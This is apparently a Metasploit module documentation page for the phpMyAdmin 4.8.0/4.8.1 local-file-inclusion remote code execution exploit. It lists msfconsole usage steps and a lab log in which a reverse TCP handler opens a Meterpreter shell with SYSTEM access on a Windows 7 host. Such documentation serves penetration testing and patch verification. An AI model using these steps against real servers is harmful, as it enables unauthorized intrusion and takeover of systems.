adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
974e5d5750434f24212d7bd83f31081883cbb334
metasploit-gs/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md
T

38 lines
1.2 KiB
Markdown
Raw Normal View History

Land #10260, Add phpMyAdmin v4.8.1/4.8.0 LFI RCE
2018-07-11 11:10:52 -05:00
## Description
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.
## Vulnerable Application
[phpMyAdmin v4.8.1](https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip) and v4.8.0
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/multi/http/phpmyadmin_lfi_rce`
3. `set rhosts <rhost>`
4. `run`
## Scenarios
### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1
```
msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run
[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500
meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer :
OS : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```
Reference in New Issue Copy Permalink